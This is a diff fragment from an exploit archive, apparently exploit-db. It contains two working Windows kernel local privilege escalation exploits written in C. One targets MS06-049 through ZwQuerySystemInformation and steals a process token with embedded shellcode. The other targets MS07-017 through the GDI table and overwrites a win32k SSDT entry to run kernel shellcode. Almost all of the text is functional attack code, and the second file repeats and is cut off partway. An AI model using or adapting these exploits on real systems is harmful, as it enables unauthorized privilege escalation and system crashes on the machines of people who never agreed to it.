+
+typedef struct _SYSTEM_MODULE_INFORMATION {
+    ULONG Reserved[2];
+    PVOID Base;
+    ULONG Size;
+    ULONG Flags;
+    USHORT Index;
+    USHORT Unknow;
+    USHORT LoadCount;
+    USHORT ModuleNameOffset;
+    char ImageName[256];    
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
+
+unsigned char kfunctions[64][64] = 
+{
+                            //ntoskrnl.exe
+    {"ZwTerminateProcess"},
+    {""},
+};
+
+unsigned char shellcode[] = 
+        "\x90\x60\x9c\xe9\xd1\x00\x00\x00\x5f\x4f\x47\x33\xc0\x66\x81\x3f"
+        "\x90\xcc\x75\xf6\x40\x40\x66\x81\x3c\x07\xcc\x90\x75\xec\x83\xc7"
+        "\x04\xbe\x38\xf0\xdf\xff\x8b\x36\xad\xad\x48\x81\x38\x4d\x5a\x90"
+        "\x00\x75\xf7\x95\x8b\xf7\x6a\x01\x59\xe8\x56\x00\x00\x00\xe2\xf9"
+        "\xbb\x24\xf1\xdf\xff\x8b\x1b\x8b\x43\x44\xb9\x08\x00\x00\x00\xe8"
+        "\x2c\x00\x00\x00\x8b\xd0\x8b\x4e\x04\xe8\x22\x00\x00\x00\x8b\x8a"
+        "\x2c\x01\x00\x00\x89\x88\x2c\x01\x00\x00\x56\x8b\x7e\x0c\x8b\x4e"
+        "\x10\x8b\x76\x08\xf3\xa4\x5e\x33\xc0\x50\x50\xff\x16\x9d\x61\xc3"
+        "\x8b\x80\xa0\x00\x00\x00\x2d\xa0\x00\x00\x00\x39\x88\x9c\x00\x00"
+        "\x00\x75\xed\xc3\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56"
+        "\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe"
+        "\x10\x85\xd2\x74\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1\x3b\x1f\x75"
+        "\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd"
+        "\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x2a\xff\xff\xff\x90\x90"
+
+        "\x90\xcc\xcc\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\x90\x90\xcc";
+
+void ErrorQuit(char *msg)
+{
+    printf("%s:%x\n", msg, GetLastError());
+    ExitProcess(0);
+}
+
+ULONG ComputeHash(char *ch)
+{
+    ULONG ret = 0;
+
+    while(*ch)
+    {
+        ret = ((ret << 25) | (ret >> 7)) + *ch++;
+    }
+
+    return ret;
+}
+
+ULONG RVA2Offset(ULONG RVA, PIMAGE_SECTION_HEADER pSectionHeader, ULONG Sections)
+{    
+    ULONG i;
+    
+    if(RVA < pSectionHeader[0].PointerToRawData)
+        return RVA;
+
+    for(i = 0; i < Sections; i++)
+    {   
+        if(RVA >= pSectionHeader[i].VirtualAddress &&
+           RVA < pSectionHeader[i].VirtualAddress + pSectionHeader[i].SizeOfRawData)           
+           return (RVA - pSectionHeader[i].VirtualAddress + pSectionHeader[i].PointerToRawData);
+    }
+    
+    return 0;
+}
+
+ULONG Offset2RVA(ULONG Offset, PIMAGE_SECTION_HEADER pSectionHeader, ULONG Sections)
+{   
+    ULONG i;
+    
+    if(Offset < pSectionHeader[0].PointerToRawData)
+        return Offset;
+    
+    for(i = 0; i < Sections; i++)
+    {
+        if(Offset >= pSectionHeader[i].PointerToRawData &&
+           Offset < pSectionHeader[i].PointerToRawData + pSectionHeader[i].SizeOfRawData)
+           return (Offset - pSectionHeader[i].PointerToRawData + pSectionHeader[i].VirtualAddress);
+    }
+    
+    return 0;
+}
+
+void GetFunction()
+{
+    HANDLE    hNtdll;
+    
+    hNtdll = LoadLibrary("ntdll.dll");
+    if(hNtdll == NULL)
+        ErrorQuit("LoadLibrary failed.\n");
+        
+    ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
+    if(ZwVdmControl == NULL)
+        ErrorQuit("GetProcAddress failed.\n");
+        
+    ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "ZwQueryInformationProcess");
+    if(ZwQueryInformationProcess == NULL)
+        ErrorQuit("GetProcAddress failed.\n");
+        
+    ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
+    if(ZwQuerySystemInformation == NULL)
+        ErrorQuit("GetProcessAddress failed.\n");
+        
+    FreeLibrary(hNtdll);
+}
+
+ULONG GetKernelBase()
+{
+    ULONG    i, Byte, ModuleCount;
+    PVOID    pBuffer;
+    PSYSTEM_MODULE_INFORMATION    pSystemModuleInformation;
+    PCHAR    pName;
+    
+    ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
+        
+    if((pBuffer = malloc(Byte)) == NULL)
+        ErrorQuit("malloc failed.\n");
+        
+    if(ZwQuerySystemInformation(SystemModuleInformation, pBuffer, Byte, &Byte))
+        ErrorQuit("ZwQuerySystemInformation failed\n");
+    
+    ModuleCount = *(PULONG)pBuffer;
+    pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG));
+    for(i = 0; i < ModuleCount; i++)
+    {
+        if((pName = strstr(pSystemModuleInformation->ImageName, "ntoskrnl.exe")) != NULL)
+        {
+            free(pBuffer);    
+            return (ULONG)pSystemModuleInformation->Base;
+        }
+        
+        pSystemModuleInformation++;
+    }
+        
+    free(pBuffer);
+    return 0;
+}
+
+int main(int argc, char *argv[])
+{
+    PULONG    pStoreBuffer, pNamesArray, pFunctionsArray, pShellcode, pRestoreBuffer;
+    PUCHAR    pBase;
+    PCHAR        pName;
+    PUSHORT        pOrdinals;
+    PIMAGE_NT_HEADERS    pHeader;
+    PIMAGE_EXPORT_DIRECTORY    pExport;
+    PIMAGE_SECTION_HEADER pSectionHeader;
+    PROCESS_BASIC_INFORMATION pbi;
+    SYSTEM_MODULE_INFORMATION    smi;
+    char        DriverName[256];
+    ULONG        Byte, FileSize, len, i, j, k, Count, BaseAddress, Value, KernelBase, buf[64], HookAddress, Temp, Sections;
+    USHORT    index;
+    HANDLE    hDevice, hFile, hFileMap;
+
+    printf("\n MS06-049 Windows ZwQuerySystemInformation Local Privilege Escalation Vulnerability Exploit \n\n");
+    printf("\t Create by SoBeIt. \n\n");
+    if(argc != 1)
+    {
+        printf(" Usage:%s \n\n", argv[0]);
+        return 1;
+    }
+
+    GetFunction();
+
+    if(ZwQueryInformationProcess(GetCurrentProcess(), ProcessBasicInformation, (PVOID)&pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL))
+        ErrorQuit("ZwQueryInformationProcess failed\n");
+    
+    KernelBase = GetKernelBase();
+    if(!KernelBase)
+        ErrorQuit("Unable to get kernel base address.\n");
+        
+    printf("Kernel base address: %x\n", KernelBase);
+
+    pRestoreBuffer = malloc(0x100);
+    if(pRestoreBuffer == NULL)
+        ErrorQuit("malloc failed.\n");
+    
+    pStoreBuffer = VirtualAlloc(NULL, 0x1001000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+    if(pStoreBuffer == NULL)
+        ErrorQuit("VirtualAlloc failed.\n");
+        
+    printf("Allocated address:%x\n", pStoreBuffer);
+    
+    if(!GetSystemDirectory((PUCHAR)pStoreBuffer, 256))
+        ErrorQuit("GetSystemDirectory failed.\n");
+
+    strcat((PUCHAR)pStoreBuffer, "\\ntoskrnl.exe");
+    hFile = CreateFile((PUCHAR)pStoreBuffer, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+    if(hFile == INVALID_HANDLE_VALUE)
+    {
+        hFile = CreateFile("ntoskrnl.exe", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+        if(hFile == INVALID_HANDLE_VALUE)
+            ErrorQuit("CreateFile failed.\n");
+    }
+
+    if((FileSize = GetFileSize(hFile, NULL)) == 0xffffffff)
+        ErrorQuit("GetFileSize failed.\n");
+
+    printf("File size:%x\n", FileSize);
+    pBase = (PUCHAR)VirtualAlloc(NULL, FileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+    if(pBase == NULL)
+        ErrorQuit("VirtualAlloc failed.\n");
+        
+    if(!ReadFile(hFile, pBase, FileSize, &Byte, NULL))
+        ErrorQuit("ReadFile failed.\n");
+
+    pHeader = (PIMAGE_NT_HEADERS)(pBase + ((PIMAGE_DOS_HEADER)pBase)->e_lfanew);
+    pSectionHeader = (PIMAGE_SECTION_HEADER)((PUCHAR)(&pHeader->OptionalHeader) + pHeader->FileHeader.SizeOfOptionalHeader);
+    Sections= pHeader->FileHeader.NumberOfSections;
+
+    pExport = (PIMAGE_EXPORT_DIRECTORY)(pBase + 
+        RVA2Offset(pHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress,
+        pSectionHeader,
+        Sections
+        ));
+
+    pNamesArray = (PULONG)(pBase + 
+                    RVA2Offset(pExport->AddressOfNames,
+                        pSectionHeader,
+                        Sections));
+                        
+    pFunctionsArray = (PULONG)(pBase +                        
+                    RVA2Offset(pExport->AddressOfFunctions,
+                        pSectionHeader,
+                        Sections));
+                        
+    pOrdinals = (PUSHORT)(pBase + 
+                    RVA2Offset(pExport->AddressOfNameOrdinals,
+                        pSectionHeader,
+                        Sections));
+                        
+    len = strlen("NtVdmControl");
+    for(i = 0; i < pExport->NumberOfNames; i++)
+    {
+        pName = pBase + RVA2Offset(pNamesArray[i], pSectionHeader, Sections);
+        if(!strncmp(pName, "NtVdmControl", len))
+            break;
+    }
+
+    if(i > pExport->NumberOfFunctions)
+        ErrorQuit("Some error occured.\n");
+
+    index = pOrdinals[i]; 
+    HookAddress = pFunctionsArray[index] + KernelBase;
+    memcpy((PUCHAR)pRestoreBuffer, pBase + pFunctionsArray[index] - 1, 0x10);
+    printf("%s Address:%x\n", "NtVdmControl", HookAddress);
+    
+    pShellcode = (PULONG)shellcode;
+    for(k = 0; pShellcode[k++] != 0x90cccc90; )
+                ;
+
+    for(j = 0; kfunctions[j][0] != '\x0'; j++)
+        buf[j] = ComputeHash(kfunctions[j]);
+
+    buf[j++] = pbi.InheritedFromUniqueProcessId;
+    buf[j++] = (ULONG)pRestoreBuffer;
+    buf[j++] = HookAddress - 1;
+    buf[j++] = 0x10;    
+
+    memcpy((char *)(pShellcode + k), (char *)buf, j * 4);
+    
+    Temp = 0;
+    for(i = 0; i < 7; i++)
+    {
+        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
+        Byte = Byte / sizeof(SYSTEM_MODULE_INFORMATION);
+        Temp += Byte;
+    }
+    
+    Byte = Temp / 7;
+    printf("Single value:%x\n", Byte);
+    Value = (0xe9 << 8) & 0xff00;
+    printf("Jump value:%x\n", Value);
+    printf("Base value:%x\n", pRestoreBuffer[0]);
+    for(Count = 0; ; Count++)
+    {
+        if(((pRestoreBuffer[0] + Count * Byte) & 0xff00) == Value)
+            break;    
+    }
+    
+    printf("Need value generated:%x\n", pRestoreBuffer[0] + Count * Byte);
+    printf("Count value:%x\n", Count);
+    for(i = 0; i < Count; i ++)
+        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)(HookAddress - 1), 0, &Byte);
+
+    Temp = 0;
+    for(i = 0; i < 7; i++)
+    {
+        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
+        Byte = Byte / sizeof(SYSTEM_MODULE_INFORMATION);
+        Temp += Byte;
+    }
+    
+    Byte = Temp / 7;
+    printf("Single value:%x\n", Byte);
+    Value = (((ULONG)pStoreBuffer + 0x800000 - HookAddress) >> 16) & 0xfff0;
+    printf("Jump value:%x\n", Value);
+    printf("Base value:%x\n", pRestoreBuffer[1]);
+    for(Count = 0; ; Count++)
+    {
+        if(((pRestoreBuffer[1] + Count * Byte) & 0xfff0) == Value)
+            break;
+    }
+
+    printf("Need value generated:%x\n", pRestoreBuffer[1] + Count * Byte);
+    printf("Count value:%x\n", Count);
+    for(i = 0; i < Count; i ++)
+        ZwQuerySystemInformation(SystemModuleInformation, (PVOID)(HookAddress + 3), 0, &Byte);
+
+    memset(pStoreBuffer, 0x90, 0x1001000);
+    memcpy((PUCHAR)pStoreBuffer + 0x1000000, shellcode, sizeof(shellcode));
+        
+    CloseHandle(hFile);
+
+    printf("Exploitation finished.\n");
+    ZwVdmControl(0, NULL);
+    
+    return 1;
+}
+
+// milw0rm.com [2006-09-21]

platforms/windows/local/3688.c

@@ -1,340 +1,340 @@
-#define _WIN32_WINNT 0x0500
-#include <windows.h>
-#include <shlwapi.h>
-#include <stdio.h>
-
-#pragma comment (lib, "user32.lib")
-#pragma comment (lib, "gdi32.lib")
-#pragma comment (lib, "shlwapi.lib")
-#pragma comment (lib, "ntdll.lib")
-
-
-
-/*
-Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences
-by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's changean entry of the 
-win32k's SSDT by 0x2. 
-
-before :
-lkd> dps bf998300 L 2
-bf998300  bf934921 win32k!NtGdiAbortDoc
-bf998304  bf94648d win32k!NtGdiAbortPath
-
-after :
-lkd> dps bf998300 L 2
-bf998300  00000002
-bf998304  bf94648d win32k!NtGdiAbortPath
-
-win32k.sys bDeleteBrush (called by DeleteObject)
-mov     esi, [edx] ;esi=pKernelInfo
-cmp     [esi+4], ebx ; ebx=0, we need [esi+4]>0
-mov     eax, [edx+0Ch]
-mov     [ebp+var_8], eax
-ja      short loc_BF80C1E7 ;jump if [esi+4] > 0
-
-loc_BF80C1E7:
-mov     eax, [esi+24h]  ; [esi+24] = addr to hijack (here win32k SSDT)
-mov     dword ptr [eax], 2 ; !!!!!
-
-At 0x2 we allocate memory with NtAllocateVirtualMemory and we copy our payload.
-
-Tested on windows xp sp2 french last updates (before MS07-017) 
-
-Coded by Ivanlef0u. 
-http://ivanlef0u.free.fr
-
-ref:
-http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
-http://research.eeye.com/html/alerts/zeroday/20061106.html
-http://projects.info-pull.com/mokb/MOKB-06-11-2006.html
-https://www.blackhat.com/presentations/bh-eu-07/Eriksson-Janmar/Whitepaper/bh-eu-07-eriksson-WP.pdf
-http://www.securityfocus.com/bid/20940/info
-*/
-
-typedef struct
-{
-   DWORD pKernelInfo;
-   WORD  ProcessID; 
-   WORD  _nCount;
-   WORD  nUpper;
-   WORD  nType;
-   DWORD pUserInfo;
-} GDITableEntry;
-
-typedef enum _SECTION_INFORMATION_CLASS {
-SectionBasicInformation,
-SectionImageInformation
-}SECTION_INFORMATION_CLASS; 
-
-typedef struct _SECTION_BASIC_INFORMATION { // Information Class 0
-PVOID BaseAddress;
-ULONG Attributes;
-LARGE_INTEGER Size;
-}SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;
-
-extern "C" ULONG __stdcall NtQuerySection(
-	IN HANDLE SectionHandle,
-	IN SECTION_INFORMATION_CLASS SectionInformationClass,
-	OUT PVOID SectionInformation,
-	IN ULONG SectionInformationLength,
-	OUT PULONG ResultLength OPTIONAL
-);
-
-extern "C" ULONG __stdcall NtAllocateVirtualMemory(
-	IN HANDLE ProcessHandle,
-	IN OUT PVOID *BaseAddress,
-	IN ULONG ZeroBits,
-	IN OUT PULONG AllocationSize,
-	IN ULONG AllocationType,
-	IN ULONG Protect
-);
-
-typedef LONG NTSTATUS;
-
-#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L) 
-#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) 
-
-typedef struct _UNICODE_STRING {
-USHORT Length;
-USHORT MaximumLength;
-PWSTR Buffer;
-} UNICODE_STRING, *PUNICODE_STRING;
-
-typedef enum _SYSTEM_INFORMATION_CLASS {
-SystemModuleInformation=11,
-} SYSTEM_INFORMATION_CLASS;
-
-typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11
-ULONG Reserved[2];
-PVOID Base;
-ULONG Size;
-ULONG Flags;
-USHORT Index;
-USHORT Unknown;
-USHORT LoadCount;
-USHORT ModuleNameOffset;
-CHAR ImageName[256];
-} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 
-
-extern "C" NTSTATUS __stdcall  NtQuerySystemInformation(          
-	IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
-	IN OUT PVOID SystemInformation,
-	IN ULONG SystemInformationLength,
-	OUT PULONG ReturnLength OPTIONAL
-);
-
-extern "C" ULONG __stdcall RtlNtStatusToDosError(
-  NTSTATUS Status
-);
-
-
-// generic kernel payload, reboot the b0x
-unsigned char Shellcode[]={ 
-0x60, //PUSHAD
-0x55, //PUSH EBP
-
-0x6A, 0x34,
-0x5B,
-0x64, 0x8B, 0x1B,
-0x8B, 0x6B, 0x10,
-
-0x8B, 0x45, 0x3C,
-0x8B, 0x54, 0x05, 0x78,
-0x03, 0xD5,
-0x8B, 0x5A, 0x20,
-0x03, 0xDD,
-0x8B, 0x4A, 0x18,
-0x49,
-0x8B, 0x34, 0x8B,
-0x03, 0xF5,
-0x33, 0xFF,
-0x33, 0xC0,
-0xFC,
-0xAC,
-0x84, 0xC0,
-0x74, 0x07,
-0xC1, 0xCF, 0x0D,
-0x03, 0xF8,
-0xEB, 0xF4,
-0x81, 0xFF, 0x1f, 0xaa ,0xf2 ,0xb9, //0xb9f2aa1f, KEBugCheck
-0x75, 0xE1,
-0x8B, 0x42, 0x24,
-0x03, 0xC5,
-0x66, 0x8B, 0x0C, 0x48,
-0x8B, 0x42, 0x1C,
-0x03, 0xC5,
-0x8B, 0x04 ,0x88,
-0x03, 0xC5,
-
-0x33, 0xDB,
-0xB3, 0xE5,
-0x53,
-0xFF, 0xD0,
-
-0x5D, //POP EBP
-0x61, //POPAD
-0xC3 //RET
-};	
-
-
-ULONG GetWin32kBase()
-{
-	ULONG i, Count, Status, BytesRet;
-	PSYSTEM_MODULE_INFORMATION pSMI;
-	
-	Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, 0, &BytesRet); //allocation length
-	if(Status!=STATUS_INFO_LENGTH_MISMATCH)
-		printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status));
-	
-	pSMI=(PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, BytesRet);
-	
-	Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, BytesRet, &BytesRet);
-	
-	if(Status!=STATUS_SUCCESS)
-		printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status));
-	
-	/*
-	The data returned to the SystemInformation buffer is a ULONG count of the number of
-	handles followed immediately by an array of 
-	SYSTEM_MODULE_INFORMATION.
-	*/
-	
-	Count=*(PULONG)pSMI;
-	pSMI=(PSYSTEM_MODULE_INFORMATION)((PUCHAR)pSMI+4);
-	
-	for(i=0; i<Count; i++)
-	{	
-		if(StrStr((pSMI+i)->ImageName, "win32k.sys"))
-			return (ULONG)(pSMI+i)->Base;
-	}
-	
-	HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE, pSMI);
-	
-	return 0;	
-}	
-
-
-
-	
-ULONG buff[500]={0};
-	
-int main(int argc, char* argv[])
-{
-	ULONG i, PID, Status, Old;
-	LPVOID lpMapAddress=NULL;
-	HANDLE hMapFile=(HANDLE)0x10;
-	GDITableEntry *gdiTable; 
-	SECTION_BASIC_INFORMATION SBI;
-	WORD Upr;
-	ULONG Size=0x1000;
-	PVOID Addr=(PVOID)0x2;
-	
-	printf("Windows GDI MS07-017 Local Privilege Escalation Exploit\nBy Ivanlef0u\n"
-	"http://ivanlef0u.free.fr\n"
-	"Be MAD!\n");
-	
-	//allocate memory at addresse 0x2
- 	Status=NtAllocateVirtualMemory((HANDLE)-1, &Addr, 0, &Size, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); 
- 	if(Status)
- 		printf("Error with NtAllocateVirtualMemory : 0x%x\n", Status);
- 	else
- 		printf("Addr : 0x%x OKAY\n", Addr);	
-	
-	memcpy(Addr, Shellcode, sizeof(Shellcode)); 
-	
-
-
- 	printf("win32.sys base : 0x%x\n", GetWin32kBase());
-	
-	ULONG Win32kSST=GetWin32kBase()+0x198300; //range between win32k imagebase and it's SSDT
-	printf("SSDT entry : 0x%x\n", Win32kSST); //win32k!NtGdiAbortDoc
-	
-	
-	
-	HBRUSH hBr;
-	hBr=CreateSolidBrush(0);
-
-	Upr=(WORD)((DWORD)hBr>>16);
-	printf("0x%x\n", Upr);
-
-	while(!lpMapAddress)
-	{
-		hMapFile=(HANDLE)((ULONG)hMapFile+1);
-		lpMapAddress=MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0);
-	}
-
-	if(lpMapAddress==NULL)
-	{ 
-		printf("Error with MapViewOfFile : %d\n", GetLastError()); 
-		return 0;
-	}
-
-	Status=NtQuerySection(hMapFile, SectionBasicInformation, &SBI, sizeof(SECTION_BASIC_INFORMATION), 0);
-	if (Status) //!=STATUS_SUCCESS (0)
-	{
-		printf("Error with NtQuerySection (SectionBasicInformation) : 0x%x\n", Status); 
-		return 0;
-	}
-
-	printf("Handle value : %x\nMapped address : 0x%x\nSection size : 0x%x\n\n", hMapFile, lpMapAddress, SBI.Size.QuadPart);
-	gdiTable=(GDITableEntry *)lpMapAddress;
-	PID=GetCurrentProcessId();
-	
-	for (i=0; i<SBI.Size.QuadPart; i+=sizeof(GDITableEntry))
-	{
-		if(gdiTable->ProcessID==PID && gdiTable->nUpper==Upr) //only our GdiTable and brush
-		{	
-
-			printf("gdiTable : 0x%x\n", gdiTable);
-			printf("pKernelInfo : 0x%x\n", gdiTable->pKernelInfo);
-			printf("ProcessID : %d\n", gdiTable->ProcessID);
-			printf("_nCount : %d\n", gdiTable->_nCount);
-			printf("nUpper : 0x%x\n", gdiTable->nUpper);
-			printf("nType : 0x%x\n", gdiTable->nType );
-			printf("pUserInfo : 0x%x\n\n", gdiTable->pUserInfo);
-			
-			Old=gdiTable->pKernelInfo;
-		
-			gdiTable->pKernelInfo=(ULONG)buff; //crafted buff
-			break;
-		}
-		gdiTable++;
-	}
-
-	if(!DeleteObject(hBr))
-		printf("Error with DeleteObject : %d\n", GetLastError());
-	else
-		printf("Done\n");
-
-	printf("Buff : 0x%x\n", buff);
-	memset(buff, 0x90, sizeof(buff));
-	
- 	buff[0]=0x1; //!=0
- 	buff[0x24/4]=Win32kSST; //syscall to modifY
-	buff[0x4C/4]=0x804D7000; //kernel base, just for avoiding bad mem ptr
-
- 	if(!DeleteObject(hBr))
-		printf("Error with DeleteObject : %d\n", GetLastError());	
-		
-	gdiTable->pKernelInfo=Old; //restore old value
-	
-	/*	
-	lkd> uf GDI32!NtGdiAbortDoc
-	GDI32!NtGdiAbortDoc:
-	77f3073a b800100000      mov     eax,1000h
-	77f3073f ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
-	77f30744 ff12            call    dword ptr [edx]
-	77f30746 c20400          ret     4
-	*/
-
-	__asm
-	{
-		mov eax, 0x1000
-		mov edx,0x7ffe0300
-		call dword ptr [edx]	
-	}
-	
-	return 0;
-}
-
-// milw0rm.com [2007-04-08]
+#define _WIN32_WINNT 0x0500
+#include <windows.h>
+#include <shlwapi.h>
+#include <stdio.h>
+
+#pragma comment (lib, "user32.lib")
+#pragma comment (lib, "gdi32.lib")
+#pragma comment (lib, "shlwapi.lib")
+#pragma comment (lib, "ntdll.lib")
+
+
+
+/*
+Here is a sploit for the GDI MS07-017 Local Privilege Escalation, presented during the last blackhat conferences
+by Joel Ericksson. Modify the GdiTable of the current process and by calling good API's changean entry of the 
+win32k's SSDT by 0x2. 
+
+before :
+lkd> dps bf998300 L 2
+bf998300  bf934921 win32k!NtGdiAbortDoc
+bf998304  bf94648d win32k!NtGdiAbortPath
+
+after :
+lkd> dps bf998300 L 2
+bf998300  00000002
+bf998304  bf94648d win32k!NtGdiAbortPath
+
+win32k.sys bDeleteBrush (called by DeleteObject)
+mov     esi, [edx] ;esi=pKernelInfo
+cmp     [esi+4], ebx ; ebx=0, we need [esi+4]>0
+mov     eax, [edx+0Ch]
+mov     [ebp+var_8], eax
+ja      short loc_BF80C1E7 ;jump if [esi+4] > 0
+
+loc_BF80C1E7:
+mov     eax, [esi+24h]  ; [esi+24] = addr to hijack (here win32k SSDT)
+mov     dword ptr [eax], 2 ; !!!!!
+
+At 0x2 we allocate memory with NtAllocateVirtualMemory and we copy our payload.
+
+Tested on windows xp sp2 french last updates (before MS07-017) 
+
+Coded by Ivanlef0u. 
+http://ivanlef0u.free.fr
+
+ref:
+http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
+http://research.eeye.com/html/alerts/zeroday/20061106.html
+http://projects.info-pull.com/mokb/MOKB-06-11-2006.html
+https://www.blackhat.com/presentations/bh-eu-07/Eriksson-Janmar/Whitepaper/bh-eu-07-eriksson-WP.pdf
+http://www.securityfocus.com/bid/20940/info
+*/
+
+typedef struct
+{
+   DWORD pKernelInfo;
+   WORD  ProcessID; 
+   WORD  _nCount;
+   WORD  nUpper;
+   WORD  nType;
+   DWORD pUserInfo;
+} GDITableEntry;
+
+typedef enum _SECTION_INFORMATION_CLASS {
+SectionBasicInformation,
+SectionImageInformation
+}SECTION_INFORMATION_CLASS; 
+
+typedef struct _SECTION_BASIC_INFORMATION { // Information Class 0
+PVOID BaseAddress;
+ULONG Attributes;
+LARGE_INTEGER Size;
+}SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;
+
+extern "C" ULONG __stdcall NtQuerySection(
+	IN HANDLE SectionHandle,
+	IN SECTION_INFORMATION_CLASS SectionInformationClass,
+	OUT PVOID SectionInformation,
+	IN ULONG SectionInformationLength,
+	OUT PULONG ResultLength OPTIONAL
+);
+
+extern "C" ULONG __stdcall NtAllocateVirtualMemory(
+	IN HANDLE ProcessHandle,
+	IN OUT PVOID *BaseAddress,
+	IN ULONG ZeroBits,
+	IN OUT PULONG AllocationSize,
+	IN ULONG AllocationType,
+	IN ULONG Protect
+);
+
+typedef LONG NTSTATUS;
+
+#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L) 
+#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) 
+
+typedef struct _UNICODE_STRING {
+USHORT Length;
+USHORT MaximumLength;
+PWSTR Buffer;
+} UNICODE_STRING, *PUNICODE_STRING;
+
+typedef enum _SYSTEM_INFORMATION_CLASS {
+SystemModuleInformation=11,
+} SYSTEM_INFORMATION_CLASS;
+
+typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11
+ULONG Reserved[2];
+PVOID Base;
+ULONG Size;
+ULONG Flags;
+USHORT Index;
+USHORT Unknown;
+USHORT LoadCount;
+USHORT ModuleNameOffset;
+CHAR ImageName[256];
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 
+
+extern "C" NTSTATUS __stdcall  NtQuerySystemInformation(          
+	IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
+	IN OUT PVOID SystemInformation,
+	IN ULONG SystemInformationLength,
+	OUT PULONG ReturnLength OPTIONAL
+);
+
+extern "C" ULONG __stdcall RtlNtStatusToDosError(
+  NTSTATUS Status
+);
+
+
+// generic kernel payload, reboot the b0x
+unsigned char Shellcode[]={ 
+0x60, //PUSHAD
+0x55, //PUSH EBP
+
+0x6A, 0x34,
+0x5B,
+0x64, 0x8B, 0x1B,
+0x8B, 0x6B, 0x10,
+
+0x8B, 0x45, 0x3C,
+0x8B, 0x54, 0x05, 0x78,
+0x03, 0xD5,
+0x8B, 0x5A, 0x20,
+0x03, 0xDD,
+0x8B, 0x4A, 0x18,
+0x49,
+0x8B, 0x34, 0x8B,
+0x03, 0xF5,
+0x33, 0xFF,
+0x33, 0xC0,
+0xFC,
+0xAC,
+0x84, 0xC0,
+0x74, 0x07,
+0xC1, 0xCF, 0x0D,
+0x03, 0xF8,
+0xEB, 0xF4,
+0x81, 0xFF, 0x1f, 0xaa ,0xf2 ,0xb9, //0xb9f2aa1f, KEBugCheck
+0x75, 0xE1,
+0x8B, 0x42, 0x24,
+0x03, 0xC5,
+0x66, 0x8B, 0x0C, 0x48,
+0x8B, 0x42, 0x1C,
+0x03, 0xC5,
+0x8B, 0x04 ,0x88,
+0x03, 0xC5,
+
+0x33, 0xDB,
+0xB3, 0xE5,
+0x53,
+0xFF, 0xD0,
+
+0x5D, //POP EBP
+0x61, //POPAD
+0xC3 //RET
+};	
+
+
+ULONG GetWin32kBase()
+{
+	ULONG i, Count, Status, BytesRet;
+	PSYSTEM_MODULE_INFORMATION pSMI;
+	
+	Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, 0, &BytesRet); //allocation length
+	if(Status!=STATUS_INFO_LENGTH_MISMATCH)
+		printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status));
+	
+	pSMI=(PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, BytesRet);
+	
+	Status=NtQuerySystemInformation(SystemModuleInformation, pSMI, BytesRet, &BytesRet);
+	
+	if(Status!=STATUS_SUCCESS)
+		printf("Error with NtQuerySystemInformation : 0x%x : %d \n", Status, RtlNtStatusToDosError(Status));
+	
+	/*
